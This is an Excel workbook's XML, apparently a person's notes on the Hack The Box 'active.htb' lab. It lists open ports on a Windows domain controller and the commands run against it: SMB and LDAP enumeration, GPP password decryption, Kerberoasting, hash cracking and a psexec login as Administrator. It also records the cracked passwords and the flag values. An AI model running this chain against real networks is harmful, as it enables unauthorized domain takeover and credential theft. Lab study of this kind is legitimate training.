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2DE35165-8310-4DE5-B4C4-361F3DBE9DD5}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="-120" yWindow="-16320" windowWidth="29040" windowHeight="1572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3" i="1" l="1"/>
  <c r="E2" i="1"/>
  <c r="E23" i="1"/>
  <c r="E10" i="1"/>
  <c r="E21" i="1"/>
  <c r="E14" i="1"/>
  <c r="E28" i="1"/>
  <c r="E12" i="1"/>
  <c r="E9" i="1"/>
  <c r="E15" i="1"/>
  <c r="E20" i="1"/>
  <c r="E16" i="1"/>
  <c r="E22" i="1"/>
  <c r="E17" i="1"/>
  <c r="E26" i="1"/>
  <c r="E24" i="1"/>
  <c r="E6" i="1"/>
  <c r="E5" i="1"/>
  <c r="E19" i="1"/>
  <c r="E8" i="1"/>
  <c r="E11" i="1"/>
  <c r="E4" i="1"/>
  <c r="E18" i="1"/>
  <c r="E25" i="1"/>
  <c r="E7" i="1"/>
  <c r="E3" i="1"/>
  <c r="E27" i="1"/>
  <c r="F13" i="1"/>
  <c r="F2" i="1"/>
  <c r="F23" i="1"/>
  <c r="F10" i="1"/>
  <c r="F21" i="1"/>
  <c r="F14" i="1"/>
  <c r="F28" i="1"/>
  <c r="F12" i="1"/>
  <c r="F9" i="1"/>
  <c r="F15" i="1"/>
  <c r="F20" i="1"/>
  <c r="F16" i="1"/>
  <c r="F22" i="1"/>
  <c r="F17" i="1"/>
  <c r="F26" i="1"/>
  <c r="F24" i="1"/>
  <c r="F6" i="1"/>
  <c r="F5" i="1"/>
  <c r="F19" i="1"/>
  <c r="F8" i="1"/>
  <c r="F11" i="1"/>
  <c r="F4" i="1"/>
  <c r="F18" i="1"/>
  <c r="F25" i="1"/>
  <c r="F7" i="1"/>
  <c r="F3" i="1"/>
  <c r="F27" i="1"/>
</calcChain>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="204" uniqueCount="116">
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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57417/udp</t>
  </si>
  <si>
    <t>9389/tcp</t>
  </si>
  <si>
    <t>53/tcp</t>
  </si>
  <si>
    <t>49168/tcp</t>
  </si>
  <si>
    <t>636/tcp</t>
  </si>
  <si>
    <t>49162/tcp</t>
  </si>
  <si>
    <t>47001/tcp</t>
  </si>
  <si>
    <t>57596/udp</t>
  </si>
  <si>
    <t>5722/tcp</t>
  </si>
  <si>
    <t>593/tcp</t>
  </si>
  <si>
    <t>49152/tcp</t>
  </si>
  <si>
    <t>49158/tcp</t>
  </si>
  <si>
    <t>49153/tcp</t>
  </si>
  <si>
    <t>49166/tcp</t>
  </si>
  <si>
    <t>49154/tcp</t>
  </si>
  <si>
    <t>56642/udp</t>
  </si>
  <si>
    <t>53/udp</t>
  </si>
  <si>
    <t>389/tcp</t>
  </si>
  <si>
    <t>139/tcp</t>
  </si>
  <si>
    <t>49157/tcp</t>
  </si>
  <si>
    <t>464/tcp</t>
  </si>
  <si>
    <t>3268/tcp</t>
  </si>
  <si>
    <t>135/tcp</t>
  </si>
  <si>
    <t>49155/tcp</t>
  </si>
  <si>
    <t>56406/udp</t>
  </si>
  <si>
    <t>445/tcp</t>
  </si>
  <si>
    <t>88/tcp</t>
  </si>
  <si>
    <t>135/tcp   open   msrpc         Microsoft Windows RPC</t>
  </si>
  <si>
    <t>139/tcp   open   netbios-ssn   Microsoft Windows netbios-ssn</t>
  </si>
  <si>
    <t>445/tcp   open   microsoft-ds?</t>
  </si>
  <si>
    <t>464/tcp   open   tcpwrapped</t>
  </si>
  <si>
    <t>593/tcp   open   ncacn_http    Microsoft Windows RPC over HTTP 1.0</t>
  </si>
  <si>
    <t>636/tcp   open   tcpwrapped</t>
  </si>
  <si>
    <t>3268/tcp  open   ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)</t>
  </si>
  <si>
    <t>5722/tcp  open   msrpc         Microsoft Windows RPC</t>
  </si>
  <si>
    <t>9389/tcp  open   mc-nmf        .NET Message Framing</t>
  </si>
  <si>
    <t>47001/tcp open   http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found</t>
  </si>
  <si>
    <t>49152/tcp open   msrpc         Microsoft Windows RPC</t>
  </si>
  <si>
    <t>49153/tcp open   msrpc         Microsoft Windows RPC</t>
  </si>
  <si>
    <t>49154/tcp open   msrpc         Microsoft Windows RPC</t>
  </si>
  <si>
    <t>49155/tcp open   msrpc         Microsoft Windows RPC</t>
  </si>
  <si>
    <t>49157/tcp open   ncacn_http    Microsoft Windows RPC over HTTP 1.0</t>
  </si>
  <si>
    <t>49158/tcp open   msrpc         Microsoft Windows RPC</t>
  </si>
  <si>
    <t>49162/tcp open   msrpc         Microsoft Windows RPC</t>
  </si>
  <si>
    <t>49166/tcp open   msrpc         Microsoft Windows RPC</t>
  </si>
  <si>
    <t>49168/tcp open   msrpc         Microsoft Windows RPC</t>
  </si>
  <si>
    <t>cat hosts /etc/hosts | sudo tee /etc/hosts | head -1</t>
  </si>
  <si>
    <t xml:space="preserve">sudo vim /etc/resolv.conf </t>
  </si>
  <si>
    <t>sudo nmap --script smb-enum-shares,smb-enum-users -p 139,445 active.htb</t>
  </si>
  <si>
    <t>Windows Server 2008</t>
  </si>
  <si>
    <t>https://www.hackingarticles.in/active-directory-pentesting-using-netexec-tool-a-complete-guide/</t>
  </si>
  <si>
    <t>Misc</t>
  </si>
  <si>
    <t>Port 445 – SMB over TCP. Modern Windows RPC heavily uses this. Tools like rpcclient use SMB as the transport layer to carry DCE/RPC calls.
Port 135 – the RPC Endpoint Mapper. Clients query this to find out which dynamic port a specific RPC service is listening on.
Port 139 – older NetBIOS-based SMB, used as a fallback.
High dynamic ports (1024–65535) – some RPC services get assigned random ports, advertised via port 135.</t>
  </si>
  <si>
    <t>smb: \active.htb\&gt; recurse on
smb: \active.htb\&gt; prompt off
smb: \active.htb\&gt; mget *</t>
  </si>
  <si>
    <t>grep -ri "password" .</t>
  </si>
  <si>
    <t>python3 gpp-decrypt.py -c edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ</t>
  </si>
  <si>
    <t>https://www.hackingarticles.in/active-directory-pentesting-using-netexec-tool-a-complete-guide/
https://0xdf.gitlab.io/cheatsheets/smb-enum
https://www.mindpointgroup.com/blog/privilege-escalation-via-group-policy-preferences-gpp
https://delinea.com/blog/windows-privilege-escalation</t>
  </si>
  <si>
    <t>active.htb</t>
  </si>
  <si>
    <t xml:space="preserve">53/udp    open  domain  Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: </t>
  </si>
  <si>
    <t>56406/udp open  domain  Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)</t>
  </si>
  <si>
    <t>56642/udp open  domain  Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)</t>
  </si>
  <si>
    <t>57417/udp open  domain  Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)</t>
  </si>
  <si>
    <t>57596/udp open  domain  Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">53/tcp    open   domain        </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Aptos Narrow"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Microsoft DNS 6.1.7601</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Aptos Narrow"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)</t>
    </r>
  </si>
  <si>
    <t>88/tcp    open   kerberos-sec  Microsoft Windows Kerberos (server time: 2026-06-23 21:31:44Z)</t>
  </si>
  <si>
    <t xml:space="preserve">nxc ldap dc.active.htb -u SVC_TGS -p GPPstillStandingStrong2k18 --kerberoasting hash.txt  </t>
  </si>
  <si>
    <t xml:space="preserve">john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt </t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Enumerating LDAP with credentials.
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Aptos Narrow"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Okay there is a lot of info. Gotta take time to go through it all.</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Aptos Narrow"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
Lol I'm so annoyed, I had another active.htb entry in my DNS record. Kerberoasting.
Cracked.
root.txt:7a2626a357de300c0e7bdbe65b2edaa8</t>
    </r>
  </si>
  <si>
    <t>https://www.crowdstrike.com/en-us/cybersecurity-101/cyberattacks/kerberoasting/</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Administrator
SVC_TGS        
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Aptos Narrow"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">Administrator:Ticketmaster1968     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root.txt:7a2626a357de300c0e7bdbe65b2edaa8   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                                                            </t>
    </r>
  </si>
  <si>
    <t>[victim IP]</t>
  </si>
  <si>
    <t>No anon connection. 
enum4linux found some stuff.
//[victim IP]/ADMIN$   Mapping: DENIED Listing: N/A Writing: N/A                                                                                                                                                     
//[victim IP]/C$       Mapping: DENIED Listing: N/A Writing: N/A
//[victim IP]/IPC$     Mapping: OK Listing: DENIED Writing: N/A
//[victim IP]/NETLOGON Mapping: DENIED Listing: N/A Writing: N/A
//[victim IP]/Replication      Mapping: OK Listing: OK Writing: N/A
//[victim IP]/SYSVOL   Mapping: DENIED Listing: N/A Writing: N/A
//[victim IP]/Users    Mapping: DENIED Listing: N/A Writing: N/A
Oh so because I put a random user my first connection didn't work.
Oh cool you can connect to the read only replication share.
Groups.xml is very interesting. Yeah looks like you can exploit it.
Lol I didn't see SVC_TGS had a folder. User.txt in there.
Trying enum4linux.</t>
  </si>
  <si>
    <t xml:space="preserve">//[victim IP]/Replication 
Groups.xml
SVC_TGS:GPPstillStandingStrong2k18
user.txt: 5cb044c73d4e974d7666e2fc5545596e
</t>
  </si>
  <si>
    <t>sudo masscan -pT:1-65535,U:1-65535 --rate=1000 -e tun0 [victim IP] &gt; raw_ports.txt</t>
  </si>
  <si>
    <t>sudo nmap -p$(cat raw_ports.txt | cut -d ' ' -f 4 | cut -d '/' -f 1 | sort -un | tr '\n' ',' | sed 's/,$//') -sS -sV --version-all -sC -O -v [victim IP]</t>
  </si>
  <si>
    <t xml:space="preserve">netexec smb [victim IP] --generate-hosts-file hosts  </t>
  </si>
  <si>
    <t>netexec smb [victim IP] -u null -p '' --shares</t>
  </si>
  <si>
    <t>netexec smb  [victim IP] -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18'</t>
  </si>
  <si>
    <t>enum4linux -a [victim IP]</t>
  </si>
  <si>
    <t>rpcclient -U '' -N [victim IP]</t>
  </si>
  <si>
    <t>nxc smb [victim IP] -u '' -p '' --shares</t>
  </si>
  <si>
    <t>netexec smb [victim IP] -u '' -p '' -M spider_plus</t>
  </si>
  <si>
    <t xml:space="preserve">smbclient //[victim IP]/replication -N </t>
  </si>
  <si>
    <t>nxc smb [victim IP] -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' --shares</t>
  </si>
  <si>
    <t>smbclient //[victim IP]/Users -U SVC_TGS GPPstillStandingStrong2k18</t>
  </si>
  <si>
    <t>netexec smb [victim IP] -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' -M spider_plus</t>
  </si>
  <si>
    <t>nxc ldap [victim IP] -u SVC_TGS -p GPPstillStandingStrong2k18</t>
  </si>
  <si>
    <t>nxc ldap [victim IP] -u SVC_TGS -p GPPstillStandingStrong2k18 --active-users</t>
  </si>
  <si>
    <t>sudo nmap -p53,56406,56642,57417,57596 -sU -sV --version-all -sC -O -v [victim IP]</t>
  </si>
  <si>
    <t>nxc ldap [victim IP] -u SVC_TGS -p GPPstillStandingStrong2k18 --users</t>
  </si>
  <si>
    <t xml:space="preserve">nxc ldap [victim IP] -u SVC_TGS -p GPPstillStandingStrong2k18 --query "(sAMAccountName=Administrator)" "" </t>
  </si>
  <si>
    <t>nxc smb [victim IP] -u 'Administrator' -p 'Ticketmaster1968' --shares</t>
  </si>
  <si>
    <t>smbclient //[victim IP]/Users -U Administrator Ticketmaster1968</t>
  </si>
  <si>
    <t>psexec.py active.htb/administrator@[victim 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</si>
</sst>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1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="2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rowdstrike.com/en-us/cybersecurity-101/cyberattacks/kerberoasting/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.hackingarticles.in/active-directory-pentesting-using-netexec-tool-a-complete-gui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8"/>
  <sheetViews>
    <sheetView tabSelected="1" workbookViewId="0">
      <pane ySplit="1" topLeftCell="A2" activePane="bottomLeft" state="frozen"/>
      <selection activeCell="E1" sqref="E1"/>
      <selection pane="bottomLeft" activeCell="G18" sqref="G18"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" customHeight="1" x14ac:dyDescent="0.3"/>
  <cols>
    <col min="1" max="1" width="13.77734375" style="2" bestFit="1" customWidth="1"/>
    <col min="2" max="2" width="29.109375" style="2" bestFit="1" customWidth="1"/>
    <col min="3" max="4" width="15.109375" style="2" customWidth="1"/>
    <col min="5" max="5" width="10.33203125" style="2" customWidth="1"/>
    <col min="6" max="6" width="14.21875" style="2" customWidth="1"/>
    <col min="7" max="7" width="55" style="2" customWidth="1"/>
    <col min="8" max="8" width="27.77734375" style="2" customWidth="1"/>
    <col min="9" max="9" width="48.88671875" style="2" customWidth="1"/>
    <col min="10" max="10" width="37.5546875" style="2" customWidth="1"/>
    <col min="11" max="11" width="52.21875" style="2" customWidth="1"/>
    <col min="12" max="16384" width="8.886718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92</v>
      </c>
      <c r="B2" s="2" t="s">
        <v>71</v>
      </c>
      <c r="C2" s="2" t="s">
        <v>79</v>
      </c>
      <c r="D2" s="2" t="s">
        <v>24</v>
      </c>
      <c r="E2" s="8" t="str">
        <f t="shared" ref="E2:E28" si="0">LEFT($D2,FIND("/",$D2)-1)</f>
        <v>53</v>
      </c>
      <c r="F2" s="9" t="str">
        <f t="shared" ref="F2:F28" si="1">MID($D2,FIND("/",$D2)+1,LEN($D2))</f>
        <v>tcp</v>
      </c>
      <c r="G2" s="2" t="s">
        <v>85</v>
      </c>
      <c r="J2" s="7"/>
    </row>
    <row r="3" spans="1:11" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3" s="2" t="s">
        <v>92</v>
      </c>
      <c r="B3" s="2" t="s">
        <v>71</v>
      </c>
      <c r="C3" s="2" t="s">
        <v>79</v>
      </c>
      <c r="D3" s="2" t="s">
        <v>48</v>
      </c>
      <c r="E3" s="8" t="str">
        <f t="shared" si="0"/>
        <v>88</v>
      </c>
      <c r="F3" s="9" t="str">
        <f t="shared" si="1"/>
        <v>tcp</v>
      </c>
      <c r="G3" s="2" t="s">
        <v>86</v>
      </c>
    </row>
    <row r="4" spans="1:11" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4" s="2" t="s">
        <v>92</v>
      </c>
      <c r="B4" s="2" t="s">
        <v>71</v>
      </c>
      <c r="C4" s="2" t="s">
        <v>79</v>
      </c>
      <c r="D4" s="2" t="s">
        <v>44</v>
      </c>
      <c r="E4" s="8" t="str">
        <f t="shared" si="0"/>
        <v>135</v>
      </c>
      <c r="F4" s="9" t="str">
        <f t="shared" si="1"/>
        <v>tcp</v>
      </c>
      <c r="G4" s="2" t="s">
        <v>49</v>
      </c>
    </row>
    <row r="5" spans="1:11" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A5" s="2" t="s">
        <v>92</v>
      </c>
      <c r="B5" s="2" t="s">
        <v>71</v>
      </c>
      <c r="C5" s="2" t="s">
        <v>79</v>
      </c>
      <c r="D5" s="2" t="s">
        <v>40</v>
      </c>
      <c r="E5" s="8" t="str">
        <f t="shared" si="0"/>
        <v>139</v>
      </c>
      <c r="F5" s="9" t="str">
        <f t="shared" si="1"/>
        <v>tcp</v>
      </c>
      <c r="G5" s="2" t="s">
        <v>50</v>
      </c>
    </row>
    <row r="6" spans="1:11" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A6" s="1" t="s">
        <v>92</v>
      </c>
      <c r="B6" s="2" t="s">
        <v>71</v>
      </c>
      <c r="C6" s="2" t="s">
        <v>79</v>
      </c>
      <c r="D6" s="2" t="s">
        <v>39</v>
      </c>
      <c r="E6" s="8" t="str">
        <f t="shared" si="0"/>
        <v>389</v>
      </c>
      <c r="F6" s="9" t="str">
        <f t="shared" si="1"/>
        <v>tcp</v>
      </c>
      <c r="H6" s="2" t="s">
        <v>89</v>
      </c>
      <c r="I6" s="2" t="s">
        <v>91</v>
      </c>
      <c r="J6" s="7" t="s">
        <v>90</v>
      </c>
    </row>
    <row r="7" spans="1:11" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A7" s="1" t="s">
        <v>92</v>
      </c>
      <c r="B7" s="2" t="s">
        <v>71</v>
      </c>
      <c r="C7" s="2" t="s">
        <v>79</v>
      </c>
      <c r="D7" s="2" t="s">
        <v>47</v>
      </c>
      <c r="E7" s="8" t="str">
        <f t="shared" si="0"/>
        <v>445</v>
      </c>
      <c r="F7" s="9" t="str">
        <f t="shared" si="1"/>
        <v>tcp</v>
      </c>
      <c r="G7" s="2" t="s">
        <v>51</v>
      </c>
      <c r="H7" s="2" t="s">
        <v>93</v>
      </c>
      <c r="I7" s="2" t="s">
        <v>94</v>
      </c>
      <c r="J7" s="7" t="s">
        <v>78</v>
      </c>
    </row>
    <row r="8" spans="1:11" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A8" s="2" t="s">
        <v>92</v>
      </c>
      <c r="B8" s="2" t="s">
        <v>71</v>
      </c>
      <c r="C8" s="2" t="s">
        <v>79</v>
      </c>
      <c r="D8" s="2" t="s">
        <v>42</v>
      </c>
      <c r="E8" s="8" t="str">
        <f t="shared" si="0"/>
        <v>464</v>
      </c>
      <c r="F8" s="9" t="str">
        <f t="shared" si="1"/>
        <v>tcp</v>
      </c>
      <c r="G8" s="2" t="s">
        <v>52</v>
      </c>
    </row>
    <row r="9" spans="1:11" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A9" s="1" t="s">
        <v>92</v>
      </c>
      <c r="B9" s="2" t="s">
        <v>71</v>
      </c>
      <c r="C9" s="2" t="s">
        <v>79</v>
      </c>
      <c r="D9" s="2" t="s">
        <v>31</v>
      </c>
      <c r="E9" s="8" t="str">
        <f t="shared" si="0"/>
        <v>593</v>
      </c>
      <c r="F9" s="9" t="str">
        <f t="shared" si="1"/>
        <v>tcp</v>
      </c>
      <c r="G9" s="2" t="s">
        <v>53</v>
      </c>
    </row>
    <row r="10" spans="1:11" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A10" s="2" t="s">
        <v>92</v>
      </c>
      <c r="B10" s="2" t="s">
        <v>71</v>
      </c>
      <c r="C10" s="2" t="s">
        <v>79</v>
      </c>
      <c r="D10" s="2" t="s">
        <v>26</v>
      </c>
      <c r="E10" s="8" t="str">
        <f t="shared" si="0"/>
        <v>636</v>
      </c>
      <c r="F10" s="9" t="str">
        <f t="shared" si="1"/>
        <v>tcp</v>
      </c>
      <c r="G10" s="2" t="s">
        <v>54</v>
      </c>
    </row>
    <row r="11" spans="1:11" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A11" s="1" t="s">
        <v>92</v>
      </c>
      <c r="B11" s="2" t="s">
        <v>71</v>
      </c>
      <c r="C11" s="2" t="s">
        <v>79</v>
      </c>
      <c r="D11" s="2" t="s">
        <v>43</v>
      </c>
      <c r="E11" s="8" t="str">
        <f t="shared" si="0"/>
        <v>3268</v>
      </c>
      <c r="F11" s="9" t="str">
        <f t="shared" si="1"/>
        <v>tcp</v>
      </c>
      <c r="G11" s="2" t="s">
        <v>55</v>
      </c>
    </row>
    <row r="12" spans="1:11" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A12" s="2" t="s">
        <v>92</v>
      </c>
      <c r="B12" s="2" t="s">
        <v>71</v>
      </c>
      <c r="C12" s="2" t="s">
        <v>79</v>
      </c>
      <c r="D12" s="2" t="s">
        <v>30</v>
      </c>
      <c r="E12" s="8" t="str">
        <f t="shared" si="0"/>
        <v>5722</v>
      </c>
      <c r="F12" s="9" t="str">
        <f t="shared" si="1"/>
        <v>tcp</v>
      </c>
      <c r="G12" s="2" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="13" spans="1:11" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A13" s="1" t="s">
        <v>92</v>
      </c>
      <c r="B13" s="2" t="s">
        <v>71</v>
      </c>
      <c r="C13" s="2" t="s">
        <v>79</v>
      </c>
      <c r="D13" s="2" t="s">
        <v>23</v>
      </c>
      <c r="E13" s="8" t="str">
        <f t="shared" si="0"/>
        <v>9389</v>
      </c>
      <c r="F13" s="9" t="str">
        <f t="shared" si="1"/>
        <v>tcp</v>
      </c>
      <c r="G13" s="2" t="s">
        <v>57</v>
      </c>
    </row>
    <row r="14" spans="1:11" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A14" s="2" t="s">
        <v>92</v>
      </c>
      <c r="B14" s="2" t="s">
        <v>71</v>
      </c>
      <c r="C14" s="2" t="s">
        <v>79</v>
      </c>
      <c r="D14" s="2" t="s">
        <v>28</v>
      </c>
      <c r="E14" s="8" t="str">
        <f t="shared" si="0"/>
        <v>47001</v>
      </c>
      <c r="F14" s="9" t="str">
        <f t="shared" si="1"/>
        <v>tcp</v>
      </c>
      <c r="G14" s="2" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="15" spans="1:11" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A15" s="2" t="s">
        <v>92</v>
      </c>
      <c r="B15" s="2" t="s">
        <v>71</v>
      </c>
      <c r="C15" s="2" t="s">
        <v>79</v>
      </c>
      <c r="D15" s="2" t="s">
        <v>32</v>
      </c>
      <c r="E15" s="8" t="str">
        <f t="shared" si="0"/>
        <v>49152</v>
      </c>
      <c r="F15" s="9" t="str">
        <f t="shared" si="1"/>
        <v>tcp</v>
      </c>
      <c r="G15" s="2" t="s">
        <v>59</v>
      </c>
    </row>
    <row r="16" spans="1:11" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A16" s="2" t="s">
        <v>92</v>
      </c>
      <c r="B16" s="2" t="s">
        <v>71</v>
      </c>
      <c r="C16" s="2" t="s">
        <v>79</v>
      </c>
      <c r="D16" s="2" t="s">
        <v>34</v>
      </c>
      <c r="E16" s="8" t="str">
        <f t="shared" si="0"/>
        <v>49153</v>
      </c>
      <c r="F16" s="9" t="str">
        <f t="shared" si="1"/>
        <v>tcp</v>
      </c>
      <c r="G16" s="2" t="s">
        <v>60</v>
      </c>
    </row>
    <row r="17" spans="1:7" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A17" s="2" t="s">
        <v>92</v>
      </c>
      <c r="B17" s="2" t="s">
        <v>71</v>
      </c>
      <c r="C17" s="2" t="s">
        <v>79</v>
      </c>
      <c r="D17" s="2" t="s">
        <v>36</v>
      </c>
      <c r="E17" s="8" t="str">
        <f t="shared" si="0"/>
        <v>49154</v>
      </c>
      <c r="F17" s="9" t="str">
        <f t="shared" si="1"/>
        <v>tcp</v>
      </c>
      <c r="G17" s="2" t="s">
        <v>61</v>
      </c>
    </row>
    <row r="18" spans="1:7" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A18" s="1" t="s">
        <v>92</v>
      </c>
      <c r="B18" s="2" t="s">
        <v>71</v>
      </c>
      <c r="C18" s="2" t="s">
        <v>79</v>
      </c>
      <c r="D18" s="2" t="s">
        <v>45</v>
      </c>
      <c r="E18" s="8" t="str">
        <f t="shared" si="0"/>
        <v>49155</v>
      </c>
      <c r="F18" s="9" t="str">
        <f t="shared" si="1"/>
        <v>tcp</v>
      </c>
      <c r="G18" s="2" t="s">
        <v>62</v>
      </c>
    </row>
    <row r="19" spans="1:7" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A19" s="1" t="s">
        <v>92</v>
      </c>
      <c r="B19" s="2" t="s">
        <v>71</v>
      </c>
      <c r="C19" s="2" t="s">
        <v>79</v>
      </c>
      <c r="D19" s="2" t="s">
        <v>41</v>
      </c>
      <c r="E19" s="8" t="str">
        <f t="shared" si="0"/>
        <v>49157</v>
      </c>
      <c r="F19" s="9" t="str">
        <f t="shared" si="1"/>
        <v>tcp</v>
      </c>
      <c r="G19" s="2" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="20" spans="1:7" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A20" s="1" t="s">
        <v>92</v>
      </c>
      <c r="B20" s="2" t="s">
        <v>71</v>
      </c>
      <c r="C20" s="2" t="s">
        <v>79</v>
      </c>
      <c r="D20" s="2" t="s">
        <v>33</v>
      </c>
      <c r="E20" s="8" t="str">
        <f t="shared" si="0"/>
        <v>49158</v>
      </c>
      <c r="F20" s="9" t="str">
        <f t="shared" si="1"/>
        <v>tcp</v>
      </c>
      <c r="G20" s="2" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="21" spans="1:7" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A21" s="1" t="s">
        <v>92</v>
      </c>
      <c r="B21" s="2" t="s">
        <v>71</v>
      </c>
      <c r="C21" s="2" t="s">
        <v>79</v>
      </c>
      <c r="D21" s="2" t="s">
        <v>27</v>
      </c>
      <c r="E21" s="8" t="str">
        <f t="shared" si="0"/>
        <v>49162</v>
      </c>
      <c r="F21" s="9" t="str">
        <f t="shared" si="1"/>
        <v>tcp</v>
      </c>
      <c r="G21" s="2" t="s">
        <v>65</v>
      </c>
    </row>
    <row r="22" spans="1:7" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A22" s="1" t="s">
        <v>92</v>
      </c>
      <c r="B22" s="2" t="s">
        <v>71</v>
      </c>
      <c r="C22" s="2" t="s">
        <v>79</v>
      </c>
      <c r="D22" s="2" t="s">
        <v>35</v>
      </c>
      <c r="E22" s="8" t="str">
        <f t="shared" si="0"/>
        <v>49166</v>
      </c>
      <c r="F22" s="9" t="str">
        <f t="shared" si="1"/>
        <v>tcp</v>
      </c>
      <c r="G22" s="2" t="s">
        <v>66</v>
      </c>
    </row>
    <row r="23" spans="1:7" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A23" s="1" t="s">
        <v>92</v>
      </c>
      <c r="B23" s="2" t="s">
        <v>71</v>
      </c>
      <c r="C23" s="2" t="s">
        <v>79</v>
      </c>
      <c r="D23" s="2" t="s">
        <v>25</v>
      </c>
      <c r="E23" s="8" t="str">
        <f t="shared" si="0"/>
        <v>49168</v>
      </c>
      <c r="F23" s="9" t="str">
        <f t="shared" si="1"/>
        <v>tcp</v>
      </c>
      <c r="G23" s="2" t="s">
        <v>67</v>
      </c>
    </row>
    <row r="24" spans="1:7" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A24" s="2" t="s">
        <v>92</v>
      </c>
      <c r="B24" s="2" t="s">
        <v>71</v>
      </c>
      <c r="C24" s="2" t="s">
        <v>79</v>
      </c>
      <c r="D24" s="2" t="s">
        <v>38</v>
      </c>
      <c r="E24" s="8" t="str">
        <f t="shared" si="0"/>
        <v>53</v>
      </c>
      <c r="F24" s="9" t="str">
        <f t="shared" si="1"/>
        <v>udp</v>
      </c>
      <c r="G24" s="2" t="s">
        <v>80</v>
      </c>
    </row>
    <row r="25" spans="1:7" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A25" s="2" t="s">
        <v>92</v>
      </c>
      <c r="B25" s="2" t="s">
        <v>71</v>
      </c>
      <c r="C25" s="2" t="s">
        <v>79</v>
      </c>
      <c r="D25" s="2" t="s">
        <v>46</v>
      </c>
      <c r="E25" s="8" t="str">
        <f t="shared" si="0"/>
